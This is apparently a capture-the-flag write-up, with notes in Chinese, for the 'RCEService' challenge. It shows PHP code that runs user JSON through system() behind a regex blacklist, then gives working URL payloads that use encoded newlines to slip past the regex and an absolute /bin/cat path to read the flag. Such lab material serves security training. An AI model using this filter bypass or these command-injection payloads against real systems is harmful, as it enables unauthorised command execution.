RCEService

<?php

putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
  $json = $_REQUEST['cmd'];

  if (!is_string($json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } else {
    echo 'Attempting to run command:<br/>';
    $cmd = json_decode($json, true)['cmd'];
    if ($cmd !== NULL) {
      system($cmd);
    } else {
      echo 'Invalid input';
    }
    echo '<br/><br/>';
  }
}

?>

严格的过滤机制,但是没有匹配换行,直接换行绕就可:

/?cmd={%0a%0a"cmd":"ls /"%0a%0a}

最终找到了flag,但是不能执行cat或者nl为什么呢?注意文件头包含这段

putenv('PATH=/home/rceservice/jail');

这里告诉我们这个文件包含的路径下包含了ls的二进制文件,所以可以执行ls命令,最后执行cat的时候填入cat命令的路径就可。

?cmd={%0a%0a"cmd":"/bin/cat /home/rceservice/flag"%0a%0a}

Last updated